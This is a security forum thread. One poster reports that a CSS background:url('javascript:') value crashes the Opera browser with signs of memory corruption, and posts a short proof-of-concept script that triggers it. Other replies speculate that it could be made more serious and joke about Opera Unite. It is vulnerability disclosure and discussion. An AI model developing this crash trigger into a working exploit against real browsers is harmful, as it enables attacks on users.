If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on).
Evendo we all LOVE opera for having lots and lots of xss vectors that dont work on any other browser.. I just woke up of bed at 3am thinking I found a way of "avoiding" opera of executing the background:url(''); xss vector.. and guess what.. it crashed with signs of memory corruption (unless its normal to have EAX pointing to 0x006a0061 that is ja, and to 0x004a0041 that is JA depending if the payload starts with javascript: or JAVASCRIPT:)
The awesome POC is:
<script>
var style="font-family:courier;background:url('javascript:123');";
window.a=document.createElement("a");
a.setAttribute("style",style);
alert(a.style.background);
</script>
so, now I dont even asume opera is gonna fix it, I'll just asume its another feature.. I mean, they did Opera unite didnt they?
That particular poc doesn't seem to be but if it was modified slightly then maybe it could be more serious
------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]
Just stopping in to say, quickly, I stopped using Opera the moment they put Opera Unite into their beta. For those that remember me, kind of a big deal for me to stop. Lol.
Kyran Wrote:
-------------------------------------------------------
> Just stopping in to say, quickly, I stopped using
> Opera the moment they put Opera Unite into their
> beta. For those that remember me, kind of a big
> deal for me to stop. Lol.
